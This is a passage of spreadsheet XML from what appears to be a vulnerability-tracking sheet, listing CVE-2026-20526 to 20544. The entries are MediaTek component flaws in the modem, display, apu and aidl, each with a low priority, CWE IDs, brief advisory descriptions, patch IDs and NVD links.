        </is>
      </c>
      <c r="S99"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needed for exploitation. Patch ID: MOLY01898195; Issue ID: MSV-8906.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20526</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20527</t>
        </is>
      </c>
      <c r="D100" s="5" t="inlineStr"/>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S100"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MOLY01864925 / MOLY01210562; Issue ID: MSV-8303.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20527</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20528</t>
        </is>
      </c>
      <c r="D101" s="5" t="inlineStr"/>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="inlineStr"/>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In ccci, there is a possible out of bounds write and read due to a missing bounds check. This could lead to local information disclosure, memory corruption, crashes, or privilege escalation if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS11428950 (Note: For MT6880, MT6890) / ALPS10563453 (Note: For MT6980D, MT6990, MT6986, MT6986D, MT6813, MT6988) / AUTO00858766 (Note: For MT2735, MT2737); Issue ID: MSV-9893.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20528</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20529</t>
        </is>
      </c>
      <c r="D102" s="5" t="inlineStr"/>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="inlineStr"/>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11276677; Issue ID: MSV-9217.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20529</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20530</t>
        </is>
      </c>
      <c r="D103" s="5" t="inlineStr"/>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="inlineStr"/>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11292777; Issue ID: MSV-9195.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20530</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20531</t>
        </is>
      </c>
      <c r="D104" s="5" t="inlineStr"/>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="inlineStr"/>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249016; Issue ID: MSV-9169.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20531</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20532</t>
        </is>
      </c>
      <c r="D105" s="5" t="inlineStr"/>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="inlineStr"/>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible application crash due to double free. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249024; Issue ID: MSV-9168.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20532</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20533</t>
        </is>
      </c>
      <c r="D106" s="5" t="inlineStr"/>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="inlineStr"/>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In display, there is a possible escalation of privilege due to an integer overflow. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11296678; Issue ID: MSV-9167.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20533</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20534</t>
        </is>
      </c>
      <c r="D107" s="5" t="inlineStr"/>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="inlineStr"/>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01797547; Issue ID: MSV-9155.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20534</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20535</t>
        </is>
      </c>
      <c r="D108" s="5" t="inlineStr"/>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="inlineStr"/>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>In aidl, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11185216; Issue ID: MSV-9039.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20535</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20536</t>
        </is>
      </c>
      <c r="D109" s="5" t="inlineStr"/>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="inlineStr"/>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In aidl, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11242428; Issue ID: MSV-9038.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20536</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20537</t>
        </is>
      </c>
      <c r="D110" s="5" t="inlineStr"/>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="inlineStr"/>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In aidl, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11185225; Issue ID: MSV-9024.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20537</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20538</t>
        </is>
      </c>
      <c r="D111" s="5" t="inlineStr"/>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="inlineStr"/>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing permission check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8914.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20538</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20539</t>
        </is>
      </c>
      <c r="D112" s="5" t="inlineStr"/>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="inlineStr"/>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8913.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20539</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20540</t>
        </is>
      </c>
      <c r="D113" s="5" t="inlineStr"/>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="inlineStr"/>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8912.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20540</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20541</t>
        </is>
      </c>
      <c r="D114" s="5" t="inlineStr"/>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="inlineStr"/>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing permission check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8911.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20541</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20542</t>
        </is>
      </c>
      <c r="D115" s="5" t="inlineStr"/>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="inlineStr"/>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>In apusys, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11076799; Issue ID: MSV-8143.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20542</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20543</t>
        </is>
      </c>
      <c r="D116" s="5" t="inlineStr"/>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="inlineStr"/>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-215</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible information disclosure due to a logic error. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01645293; Issue ID: MSV-6761.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20543</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20544</t>
        </is>
      </c>
      <c r="D117" s="5" t="inlineStr"/>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="inlineStr"/>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
